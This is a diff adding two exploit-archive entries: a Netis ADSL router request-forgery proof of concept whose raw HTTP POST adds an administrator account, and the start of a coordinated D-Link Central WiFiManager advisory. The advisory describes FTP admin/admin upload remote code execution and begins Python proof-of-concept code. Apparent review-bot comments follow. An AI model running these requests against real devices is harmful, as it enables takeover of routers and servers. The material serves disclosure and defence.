diff --git a/exploits/hardware/webapps/45532.txt b/exploits/hardware/webapps/45532.txt new file mode 100644 index 000000000..6a8bb75f0 --- /dev/null +++ b/exploits/hardware/webapps/45532.txt @@ -0,0 +1,42 @@ +# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin) +# Author: Cakes +# Discovery Date: 2018-10-01 +# Vendor Homepage: http://www.netis-systems.com +# Software Link: http://www.netis-systems.com/Home/detail/id/74.html +# Tested Version: RTK 2.1.1 +# Tested on OS: Kali Linux +# CVE: N/A + +# Description +# Due to improper session management an attacker is able to add a administrator account +# without providing any authentication credentials. + +# PoC 1 +POST /form2userconfig.cgi HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 112 + +username=Cakes&privilege=2&newpass=1234&confpass=1234&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send + +# PoC 2 + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/45533.txt b/exploits/php/webapps/45533.txt new file mode 100644 index 000000000..c8021a4fc --- /dev/null +++ b/exploits/php/webapps/45533.txt 
@@ -0,0 +1,315 @@ +Core Security - Corelabs Advisory +http://corelabs.coresecurity.com/ + +D-Link Central WiFiManager Software Controller Multiple Vulnerabilities + +1. *Advisory Information* + +Title: D-Link Central WiFiManager Software Controller Multiple +Vulnerabilities +Advisory ID: CORE-2018-0010 +Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities +Date published: 2018-10-04 +Date of last update: 2018-10-04 +Vendors contacted: D-Link +Release mode: Coordinated release + +2. *Vulnerability Information* + +Class: Unrestricted Upload of File with Dangerous Type [CWE-434], +Improper Authorization [CWE-285], Improper Neutralization of Input +During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper +Neutralization of Input During Web Page Generation +('Cross-site Scripting') [CWE-79] +Impact: Code execution +Remotely Exploitable: Yes +Locally Exploitable: Yes +CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441 + +3. *Vulnerability Description* + +D-Link's website states that: + +[1] Central WiFiManager Software Controller helps network administrators +streamline their wireless access point (AP) management workflow. Central +WiFiManager is an innovative approach to the more traditional +hardware-based multiple access point management system. It uses a +centralized server to both remotely manage and monitor wireless APs on a +network. + +Vulnerabilities were found in the Central WiFiManager Software +Controller, allowing unauthenticated and authenticated file upload with +dangerous type that could lead to remote code execution with system +permissions. Also, two stored Cross Site Scripting vulnerabilities were +found. + +4. *Vulnerable Packages* + + . Central WifiManager v1.03 + +Other products and versions might be affected, but they were not tested. + +5. 
*Vendor Information, Solutions and Workarounds* + +D-Link released the following Beta version that addresses the reported vulnerabilities: + + . Central WifiManager v 1.03r0100-Beta1 + +In addition, D-Link published a security note in: +https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092 + +6. *Credits* + +These vulnerabilities were discovered and researched by Julian Muñoz +from Core Security Consulting Services. The publication of this advisory +was coordinated by Leandro Cuozzo from Core Advisories Team. + +7. *Technical Description / Proof of Concept Code* + +D-Link Central WiFiManager Software Controller exposes an FTP server +that serves by default in port 9000 and has hardcoded credentials +(admin, admin). Taking advantage of this fact, we will upload a PHP file +in the '/web/public' directory and then, by requesting this file, will +be able to execute arbitrary code on the target system (shown in 7.1). + +On 7.2 we show a similar attack to but in this case with an +authenticated user in the web application. The application has a +functionality to upload a .rar file used for the captive portal +displayed by the Access Points. We will craft a .rar with a PHP file +that we will end up executing in the context of the web application. +When the .rar is uploaded is stored in the path "\web\captivalportal" in +a folder with a timestamp created by the PHP time() function. In order +to know what is the web server's time we request an information file +that contains the time we are looking for. After we have the server's +time we upload the .rar, calculate the proper epoch and request the +appropriate path increasing this epoch by one until we hit the correct +one. + +Finally, we discovered two Cross-Site Scripting, one on the update site +functionality, in the 'sitename' parameter (7.3) and the other one on +the creation of a local user in the 'username' parameter (7.4). + +7.1. 
*Unauthenticated Remote Code Execution by Unrestricted Upload of +File with Dangerous Type* + +[CVE-2018-17440] The web application starts an FTP server running on the +port 9000 by default with admin/admin credentials and do not show the +option to change it, so in this POC we establish a connection with the +server and upload a PHP file. Since the application do not restrict +unauthenticated users to request any file in the web root, we later +request the uploaded file to achieve remote code execution. + +/----- +import requests +from ftplib import FTP + +#stablish connection with FTP server +host_ip = "127.0.0.1" +ftp = FTP() +ftp.connect(host=host_ip
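Review bot: in the 45532.txt hunk, the `# PoC 2` section is empty; the header is followed only by blank `+` lines, so either the second proof of concept was dropped or it was never written, and since the title says Cross-Site Request Forgery, what a reader expects there is the cross-origin form that a victim's browser would submit. The classification also needs reconciling with the description: `# Description` says an administrator is added "without providing any authentication credentials", which describes a missing authentication check on `form2userconfig.cgi`, whereas CSRF presupposes an authenticated victim; please state which it is, because the fix differs (an authorization check on the handler versus an anti-CSRF token tied to the session), and the CVSS/impact reads very differently. Minor: `Content-Length: 112` does not match the 110-byte body shown, which will make a replayed request hang or be rejected, and "a administrator" should be "an administrator".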
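Review bot: in the 45533.txt hunk, section 2 lists four CVEs (CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441) but only 7.1 is tagged with its identifier in the visible text, and the list is not in section order; suggest heading each of 7.1 to 7.4 with its CVE and listing them in that order so readers can map advisory IDs to findings. The `Class:` line repeats the full CWE-79 description twice; "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] (two instances)" says the same thing once. Section 5 gives only the Beta build and no interim workaround, even though 7.1 states the FTP server on port 9000 uses admin/admin and the UI offers no way to change it; a sentence recommending that TCP/9000 be firewalled to the management network and that write access to `/web/public` be restricted until the fix is applied would help operators who cannot deploy a beta. Wording: "a similar attack to but in this case" is missing its object (presumably "similar attack to 7.1"), "When the .rar is uploaded is stored" needs "it is stored", "do not show the option" and "do not restrict" should be "does not", and the code comment `#stablish` should be `#establish`.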